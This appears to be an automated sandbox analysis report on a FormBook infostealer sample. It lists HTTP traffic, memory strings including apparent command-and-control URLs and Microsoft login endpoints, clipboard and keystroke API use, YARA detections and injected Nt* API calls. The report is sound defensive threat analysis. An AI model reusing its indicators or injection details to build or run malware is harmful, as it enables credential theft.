                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 05:56:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 05:56:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 05:56:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 05:56:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: firefox.exe, 00000008.00000002.2345513606.0000021D37B2D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.linkdex.com/bots/)
                Source: FKUPIibLrFYhJ.exe, 00000007.00000002.3561922988.00000000050D4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mraber.dev
                Source: FKUPIibLrFYhJ.exe, 00000007.00000002.3561922988.00000000050D4000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mraber.dev/ixqi/
                Source: relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: relog.exe, 00000006.00000002.3559238568.00000000030F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: relog.exe, 00000006.00000002.3559238568.00000000030F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: relog.exe, 00000006.00000002.3559238568.00000000030F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: relog.exe, 00000006.00000002.3559238568.00000000030F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: relog.exe, 00000006.00000002.3559238568.00000000030F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: relog.exe, 00000006.00000002.3559238568.00000000030DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: relog.exe, 00000006.00000003.2222278855.000000000813B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: relog.exe, 00000006.00000003.2232441210.000000000815E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: FKUPIibLrFYhJ.exe, 00000007.00000002.3560579070.00000000034EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.newbh.pro/fpja/?94=IUuWDP5KSR42idQ9Y9SbpAQIPkOXQJnBaCctSylP56Crxmno30P/P9QjtU4p0BAyo
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_0060EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0060EAFF
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_0060ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0060ED6A
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_0060EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0060EAFF
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_005FAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_005FAA57
                Source: C:\Users\user\Desktop\BDlwy8b7Km.exeCode function: 0_2_00629576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00629576

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3560396995.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2050133802.0000000008C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2044049875.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3560327261.0000000003380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3558981599.0000000002ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2044978027.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3560373501.0000000003830000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: BDlwy8b7Km.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: BDlwy8b7Km.exe, 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f2cb35ee-a
                Source: BDlwy8b7Km.exe, 00000000.00000002.1731495449.0000000000652000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_db27d3c4-b
                Source: BDlwy8b7Km.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_cf7ebdf7-5
                Source: BDlwy8b7Km.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_469db00c-9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C4A3 NtClose,1_2_0042C4A3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B60 NtClose,LdrInitializeThunk,1_2_03672B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03672DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036735C0 NtCreateMutant,LdrInitializeThunk,1_2_036735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674340 NtSetContextThread,1_2_03674340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03674650 NtSuspendThread,1_2_03674650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BE0 NtQueryValueKey,1_2_03672BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BF0 NtAllocateVirtualMemory,1_2_03672BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672BA0 NtEnumerateValueKey,1_2_03672BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672B80 NtQueryInformationFile,1_2_03672B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AF0 NtWriteFile,1_2_03672AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AD0 NtReadFile,1_2_03672AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672AB0 NtWaitForSingleObject,1_2_03672AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F60 NtCreateProcessEx,1_2_03672F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F30 NtCreateSection,1_2_03672F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FE0 NtCreateFile,1_2_03672FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FA0 NtQuerySection,1_2_03672FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672FB0 NtResumeThread,1_2_03672FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672F90 NtProtectVirtualMemory,1_2_03672F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E30 NtWriteVirtualMemory,1_2_03672E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EE0 NtQueueApcThread,1_2_03672EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672EA0 NtAdjustPrivilegesToken,1_2_03672EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672E80 NtReadVirtualMemory,1_2_03672E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D30 NtUnmapViewOfSection,1_2_03672D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D00 NtSetInformationFile,1_2_03672D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672D10 NtMapViewOfSection,1_2_03672D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DD0 NtDelayExecution,1_2_03672DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672DB0 NtEnumerateKey,1_2_03672DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C60 NtCreateKey,1_2_03672C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C70 NtFreeVirtualMemory,1_2_03672C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672C00 NtQueryInformationProcess,1_2_03672C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CF0 NtOpenProcess,1_2_03672CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CC0 NtQueryVirtualMemory,1_2_03672CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03672CA0 NtQueryInformationToken,1_2_03672CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673010 NtOpenDirectoryObject,1_2_03673010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673090 NtSetValueKey,1_2_03673090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036739B0 NtGetContextThread,1_2_036739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D70 NtOpenThread,1_2_03673D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03673D10 NtOpenProcessToken,1_2_03673D10
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03674340 NtSetContextThread,LdrInitializeThunk,6_2_03674340
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03674650 NtSuspendThread,LdrInitializeThunk,6_2_03674650
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672B60 NtClose,LdrInitializeThunk,6_2_03672B60
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03672BE0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03672BF0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03672BA0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672AF0 NtWriteFile,LdrInitializeThunk,6_2_03672AF0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672AD0 NtReadFile,LdrInitializeThunk,6_2_03672AD0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672F30 NtCreateSection,LdrInitializeThunk,6_2_03672F30
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672FE0 NtCreateFile,LdrInitializeThunk,6_2_03672FE0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672FB0 NtResumeThread,LdrInitializeThunk,6_2_03672FB0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03672EE0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03672E80
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03672D30
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03672D10
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03672DF0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672DD0 NtDelayExecution,LdrInitializeThunk,6_2_03672DD0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672C60 NtCreateKey,LdrInitializeThunk,6_2_03672C60
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03672C70
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03672CA0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036735C0 NtCreateMutant,LdrInitializeThunk,6_2_036735C0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_036739B0 NtGetContextThread,LdrInitializeThunk,6_2_036739B0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672B80 NtQueryInformationFile,6_2_03672B80
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672AB0 NtWaitForSingleObject,6_2_03672AB0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672F60 NtCreateProcessEx,6_2_03672F60
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672FA0 NtQuerySection,6_2_03672FA0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672F90 NtProtectVirtualMemory,6_2_03672F90
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672E30 NtWriteVirtualMemory,6_2_03672E30
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672EA0 NtAdjustPrivilegesToken,6_2_03672EA0
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672D00 NtSetInformationFile,6_2_03672D00
                Source: C:\Windows\SysWOW64\relog.exeCode function: 6_2_03672DB0 NtEnumerateKey,6_2_03672DB0
